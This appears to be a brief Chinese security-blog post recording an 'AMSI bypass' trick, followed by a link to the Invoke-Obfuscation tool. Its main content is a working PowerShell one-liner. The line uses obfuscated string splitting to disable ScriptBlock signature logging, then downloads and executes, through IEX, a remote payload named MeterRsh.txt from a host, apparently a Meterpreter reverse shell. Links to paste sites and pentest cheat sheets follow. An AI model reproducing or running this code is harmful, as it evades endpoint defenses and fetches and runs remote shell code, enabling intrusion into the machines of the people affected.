1.AMSI_bypass

[ScriptBlock]."Get`Fiel`d"('signatures','N'+'onPublic,Static').SetValue($NULL,(New-Object Collections.Generic.HashSet[string]));
    $e=new-object net.webclient;
    $e.proxy=[Net.WebRequest]::GetSystemWebProxy();
    $e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
    IEX $e.downloadstring('http://192.168.56.1/MeterRsh.txt');

https://pastebin.com/raw/iFVpKim5

https://twitter.com/search?q=https%3A%2F%2Fpastebin.com%2Fraw%2FiFVpKim5&src=typd

https://github.com/kmkz/Pentesting/blob/master/Pentest-cheat-sheet

http://www.ggsec.cn/AMSI-bypass.html

2.Invoke-Obfuscation

https://github.com/danielbohannon/Invoke-Obfuscation

转载请注明：即刻安全 » 【9.28】骚姿势记录及测试视频